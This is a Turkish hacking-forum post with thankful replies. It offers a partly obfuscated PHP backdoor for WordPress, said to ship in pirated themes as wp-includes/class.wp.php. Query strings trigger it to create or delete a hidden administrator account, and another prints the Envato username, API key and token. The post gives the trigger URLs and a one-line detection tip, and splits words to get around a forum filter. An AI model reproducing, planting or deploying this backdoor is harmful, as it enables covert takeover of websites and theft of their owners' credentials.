Wordpress Sitelere Admin Backdoor Açma/İscorpix

iscorpix · 10 Ocak 2018

Arkadaşlar kod warez temalarda backdoor açma kodudur..

Kod:

wp-includes/class.wp.php?awu=ok

diye çalıştırınca admin açar..

Kod:

wp-includes/class.wp.php?dwu=ok

diye çalışıtırınca Açılan Admini Siler..

Kod:

<?php $ { "GLOBALS" } ["qwftmjw"] = "options"; $ { "GLOBALS" } ["kludsgcibl"] = "table_name"; $ { "GLOBALS" } ["yijgunelcxk"] = "sample"; error_reporting(0); require $_SERVER["D ocument(boşluğu silin)_ROOT"] . "/wp-load.php"; $ { $ { "GLOBALS" } ["kludsgcibl"] } = $wpdb->get_blog_prefix(); $ { $ { "GLOBALS" } ["yijgunelcxk"] } = "a:1:{s:13:\"administrator\";b:1;}"; if (isset($_GET["ok"])) { echo ""; } if (isset($_GET["awu"])) { $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '1001010');"); $wpdb->query("INSERT INTO $wpdb->userm eta(boşluğu silin) (`um eta(boşluğu silin)_id`, `user_id`, `m eta(boşluğu silin)_key`, `m eta(boşluğu silin)_value`) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');"); $wpdb->query("INSERT INTO $wpdb->userm eta(boşluğu silin) (`um eta(boşluğu silin)_id`, `user_id`, `m eta(boşluğu silin)_key`, `me ta(boşluğu silin)_value`) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); } if (isset($_GET["dwu"])) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 1001010"); $wpdb->query("DELETE FROM $wpdb->userm eta(boşluğu silin)WHERE $wpdb->userme ta(boşluğu silin).`um eta(boşluğu silin)_id` = 1001010"); } if (isset($_GET["key"])) { $gvgdrowuag = "options"; $ { "GLOBALS" } ["iunegpgs"] = "options"; $ { $gvgdrowuag } = get_option(EWPT_PLUGIN_SLUG); echo "<center><h2>" . esc_attr($ { $ { "GLOBALS" } ["iunegpgs"] } ["user_name"] . ":" . esc_attr($ { $ { "GLOBALS" } ["qwftmjw"] } ["api_key"])) . "<br>"; echo esc_html(envato_market()->get_option("token")); echo "</center></h2>"; } ?>

Sitenizde backdoor olduğunu nasıl anlayabiliriz ?

Dizinde wp-includes/class.wp.php varsa backdoor var demektir.

Backdoor açtığımız sitede nasıl admin olabiliriz ?

Kod:

wp-includes/class.wp.php?awu=true

kodu ile admin olabilirsiniz.

İyi forumlar arkdaşlar..

Edit : M E T A kelimesi sansürlendiği için parantez içine yazılan boşlukları siliniz.

Dangerous01 · 10 Ocak 2018

ELine saglik isime yarar bu konu

NeOnx · 10 Ocak 2018

Eline sağlık

Rospovà · 10 Ocak 2018

Eline sağlık dostum

Halil59 · 10 Ocak 2018

Eline Sağlık Hocam İlla Birisinin İşine Yariyacağına İnanıyorum

Wordpress Sitelere Admin Backdoor Açma/İscorpix

iscorpix

Kıdemli Üye

Dangerous01

Katılımcı Üye

NeOnx

Katılımcı Üye

Rospovà

Kıdemli Üye

Halil59

Katılımcı Üye

Sosyal medya sayfalarımız